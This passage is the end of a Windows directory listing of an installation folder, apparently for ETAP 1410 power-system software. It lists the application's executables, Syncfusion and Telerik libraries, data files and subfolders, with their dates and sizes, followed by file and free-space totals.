11:45 Rules +19/01/2016 02:36 1,939,456 SC3Ph.exe +19/01/2016 02:35 5,971,968 scansi1p.exe +19/01/2016 02:36 5,232,640 scansi3p.exe +19/01/2016 02:35 6,535,168 SCGost1p.exe +19/01/2016 02:36 6,431,232 sciec1p.exe +19/01/2016 02:37 5,242,880 sciec3p.exe +19/01/2016 02:35 4,812,288 sciectr.exe +19/01/2016 02:37 5,063,680 scsource.exe +01/02/2016 11:14 21,020 search.avi +19/01/2016 02:36 7,451,648 SFA.exe +26/02/2016 16:38 32,768 ShellControl.dll +19/01/2016 02:32 1,114,112 SkmDataParserLib.dll +01/02/2016 11:14 77 SO.ini +19/01/2016 02:36 708,096 so3ph.exe +19/01/2016 02:34 752,640 stlf.exe +19/01/2016 02:35 5,911,040 svc.exe +01/02/2016 11:14 3,198,976 SX.dll +07/04/2016 11:41 Symbols +07/04/2016 11:42 SymbolsXaml +01/02/2016 11:14 1,081,344 SyncFusion.Chart.Base.dll +01/02/2016 11:14 602,112 SyncFusion.Chart.Windows.dll +01/02/2016 11:14 61,440 SyncFusion.Compression.Base.dll +01/02/2016 11:14 122,880 SyncFusion.Core.dll +01/02/2016 11:14 1,105,920 syncfusion.diagram.base.dll +01/02/2016 11:14 1,224,704 Syncfusion.Diagram.Windows.dll +01/02/2016 11:14 3,710,976 Syncfusion.DocIO.Base.dll +01/02/2016 11:14 16,384 SyncFusion.Grid.Base.dll +01/02/2016 11:14 16,384 SyncFusion.Grid.Grouping.Base.dll +01/02/2016 11:14 1,003,520 SyncFusion.Grid.Grouping.Windows.dll +01/02/2016 11:14 2,146,304 SyncFusion.Grid.Windows.dll +01/02/2016 11:14 94,208 SyncFusion.GridConverter.Windows.dll +01/02/2016 11:14 814,080 Syncfusion.GridHelperClasses.Windows.dll +01/02/2016 11:14 565,248 SyncFusion.Grouping.Base.dll +01/02/2016 11:14 192,512 SyncFusion.HTMLUI.Base.dll +01/02/2016 11:14 389,120 SyncFusion.HTMLUI.Windows.dll +01/02/2016 11:14 53,248 SyncFusion.Scripting.Base.dll +01/02/2016 11:14 131,072 SyncFusion.Scripting.Windows.dll +01/02/2016 11:14 4,055,040 SyncFusion.Shared.Base.dll +01/02/2016 11:14 26,112 SyncFusion.Shared.Windows.dll +01/02/2016 11:14 13,049,856 Syncfusion.Shared.Wpf.dll +01/02/2016 11:14 16,384 SyncFusion.Tools.Base.dll +01/02/2016 11:14 9,453,568 SyncFusion.Tools.Windows.dll +01/02/2016 11:14 4,284,416 SyncFusion.XlsIO.Base.dll +01/02/2016 11:14 7,090 syslogic.cgt +07/04/2016 11:41 Tables +01/02/2016 11:14 8,700 tables.ecd +01/02/2016 11:14 389,120 tag.mdb +19/01/2016 02:31 172,032 tccconvert.dll +19/01/2016 02:31 516,608 tccimport.exe +19/01/2016 02:36 2,227,200 TDULF.exe +19/01/2016 02:31 205,824 TDUpdate.exe +01/02/2016 11:14 1,308,672 Telerik.Windows.Controls.Chart.dll +01/02/2016 11:14 3,068,928 Telerik.Windows.Controls.Charting.dll +01/02/2016 11:14 1,734,656 Telerik.Windows.Controls.Data.dll +01/02/2016 11:14 4,346,368 Telerik.Windows.Controls.DataVisualization.dll +01/02/2016 11:14 3,376,640 Telerik.Windows.Controls.dll +01/02/2016 11:14 876,032 Telerik.Windows.Controls.Docking.dll +01/02/2016 11:14 1,039,872 Telerik.Windows.Controls.Gauge.dll +01/02/2016 11:14 270,447 Telerik.Windows.Controls.Gauge.xml +01/02/2016 11:14 2,611,200 Telerik.Windows.Controls.GridView.dll +01/02/2016 11:14 2,254,336 Telerik.Windows.Controls.Input.dll +01/02/2016 11:14 2,712,576 Telerik.Windows.Controls.Navigation.dll +01/02/2016 11:14 1,668,096 Telerik.Windows.Controls.RibbonView.dll +01/02/2016 11:14 1,863,168 Telerik.Windows.Controls.ScheduleView.dll +01/02/2016 11:14 405,948 Telerik.Windows.Controls.xml +01/02/2016 11:14 453,632 Telerik.Windows.Data.dll +01/02/2016 11:14 248,444 Telerik.Windows.Data.xml +07/04/2016 11:41 Themes +01/02/2016 11:14 56,320 TraceView.exe +19/01/2016 02:40 29,412,352 ts.exe +01/02/2016 11:14 63,488 u2lexpo.dll +01/02/2016 11:14 82,432 u2lsqrt.dll +01/02/2016 11:14 27,136 u2lstrng.dll +19/01/2016 02:34 71,680 UC.exe +26/02/2016 16:24 620,032 WCT32DR3.dll +26/02/2016 16:38 722,944 wct32dr364.dll +30/09/2015 14:48 45,843 WhatsNew_14.htm +12/11/2014 14:32 3,702 WorkPermitTemplate.xml +26/02/2016 16:25 492,032 WRT32DR3.dll +26/02/2016 16:39 592,384 wrt32dr364.dll + 395 File(s) 992,689,139 bytes + 19 Dir(s) 11,092,480,000 bytes free + +C:\ETAP 1410>